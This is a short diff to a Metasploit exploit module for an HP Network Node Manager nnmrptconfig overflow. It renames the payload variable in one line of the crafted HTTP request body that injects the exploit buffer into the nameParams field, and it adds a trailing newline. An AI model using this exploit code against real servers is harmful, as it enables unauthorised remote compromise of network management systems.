diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index ef75ecd60c..cbda909d8b 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote data << "Content&Action=Modify&Template=Avail/General+Availabiilty/monthtodat" data << "e&Operation=Apply&Params=schdParams+nameParams&schdParams=schd_select1%3Dmonto" - data << "date&nameParams=text1%3D#{boom}%262%3D%263%3D" + data << "date&nameParams=text1%3D#{sploit}%262%3D%263%3D" end @@ -138,4 +138,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end \ No newline at end of file +end